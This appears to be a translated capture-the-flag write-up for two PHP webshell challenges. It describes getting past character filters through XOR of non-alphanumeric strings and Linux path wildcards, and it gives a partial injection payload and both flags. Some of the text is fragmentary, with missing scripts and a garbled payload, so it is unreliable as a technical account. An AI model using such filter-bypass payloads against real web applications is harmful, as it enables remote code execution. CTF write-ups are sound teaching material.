1. yi_ge_webshell
After opening the link, the following page will appear.
Code requirements: Use the incoming code to construct the getFlag() function. The length should be within 50 and does not contain letters, numbers, or underscores.
After searching a lot of information, I found that there is a webshell construction method that does not contain numbers and letters, XOR.
When two strings are XORed, the corresponding Ascii code is converted into a binary operation, and the final result is still a string. Therefore, the getFlag() function can be constructed using the XOR of non-alphanumeric strings.
Use python to run the script to directly get the XOR result of special characters.
According to the XOR result, getFlag is constructed, but
directly putting the payload exceeds the limit:
so consider direct XOR of strings. In addition, you need to construct a getFlag function, which involves how to bypass letters and numbers to call the function. After reading the article, I found that you can use Chinese characters
to get the flag: SKCTF{yi_ge_sui_bian_xie_de_flag}
======================================================
2. ling_yi_ge_webshell
The code appears after opening the link:
Compared with the question yi_ge_webshell, this question adds an additional $ that cannot appear in the code restriction. According to the XOR result, there are two combinations of this symbol to get the XOR, one is _XOR{, the other is {XOR_. But the code limits the occurrence of underscores, so this method doesn't work. Another tip is: the flag is in the root directory. After reading articles by several experts, I found that the knowledge point examined is Linux wildcards.
References about wildcards 1
References about wildcards 2
References about wildcards 3
Since flag is in the root directory, you can use the wildcard /???/???/ to construct the /bin/cat/ root directory file under. Put the code into the PHP markup, and add the following structure payload: ?code=?><?=
/???/???/?>
Then you will get a bunch of code. Search SKCTF to get the flag, but I don’t understand the structure format very well. Why is it?>
? flag: SKCTF{you_shi_yi_ge_sui_bian_xie_de_flag}
Refer to Wp and Mr. Mou’s articles.
========================================================